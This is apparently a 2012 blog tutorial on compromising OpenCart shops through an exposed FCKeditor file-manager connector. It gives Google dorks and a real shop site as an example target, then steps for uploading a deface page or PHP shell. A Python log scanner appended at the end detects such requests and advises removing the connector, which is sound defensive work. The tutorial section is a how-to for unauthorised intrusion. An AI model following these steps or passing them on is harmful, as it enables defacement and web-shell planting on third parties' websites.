Thursday 20 December 2012

Wp FckEditor Tutorial


This method is also known as the OpenCart CMS (web shop) exploit. It's an old vulnerability, but many people don't know about it, so I'm publishing a tutorial here.

1- Open Google.com and enter
Dork: inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
inurl:Powered By OpenCart

Google will return a lot of websites; select any one. For example, I got this one:
http://www.schoolshopper.com.au/
Then I simply add the vulnerable URL after the website address.

Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

(The path may be different on other websites, for example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a page like this will open.

Now find the connector option at the top left of the page and change the connector to PHP.

Then find the file upload option and upload your deface page or shell.

To check the shell or deface page, visit this URL:

www.site.com/deface.html
or
www.site.com/shell.php
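
From the defender's side, the steps above leave a recognizable trail in the web server access log. The following is an added example, not part of the original post: it scans Combined Log Format lines for requests under the connector path named above. The sample log lines, their IP addresses and the `php/connector.php` script name are constructed for illustration.

```python
import re
from collections import defaultdict

# Path fragment taken from the post; everything under it belongs to the file-manager connector.
CONNECTOR = "/fckeditor/editor/filemanager/connectors/"

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample input (documentation IP ranges, illustrative script name).
BASE = "/admin/view/javascript" + CONNECTOR
SAMPLE_LOG = [
    f'203.0.113.7 - - [20/Dec/2012:10:01:02 +0000] "GET {BASE}test.html HTTP/1.1" 200 5120 "-" "-"',
    f'203.0.113.7 - - [20/Dec/2012:10:01:40 +0000] "POST {BASE}php/connector.php HTTP/1.1" 200 310 "-" "-"',
    f'198.51.100.20 - - [20/Dec/2012:11:15:09 +0000] "GET {BASE}test.html HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.55 - - [20/Dec/2012:11:20:00 +0000] "GET /index.php?route=product/category HTTP/1.1" 200 8841 "-" "-"',
]

def classify(method, path, status):
    """Return a finding label for one request, or None if it does not touch the connector."""
    if CONNECTOR not in path.lower():
        return None
    if not status.startswith("2"):
        return "blocked"          # path was requested but refused or not found
    if method == "POST":
        return "upload-accepted"  # connector answered a POST: possible file write
    return "exposed"              # connector content was served to the client

def scan(lines):
    """Collect (label, time, path) findings per client IP; unparsable lines are skipped."""
    findings = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        label = classify(m["method"], m["path"], m["status"])
        if label:
            findings[m["ip"]].append((label, m["time"], m["path"]))
    return dict(findings)

def needs_response(findings):
    """IPs for which the connector accepted a POST."""
    return sorted(ip for ip, hits in findings.items()
                  if any(label == "upload-accepted" for label, _, _ in hits))
```

Any IP returned by `needs_response` warrants a review of files recently written under the web root. Removing the `connectors` directory or restricting access to it closes the exposure.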
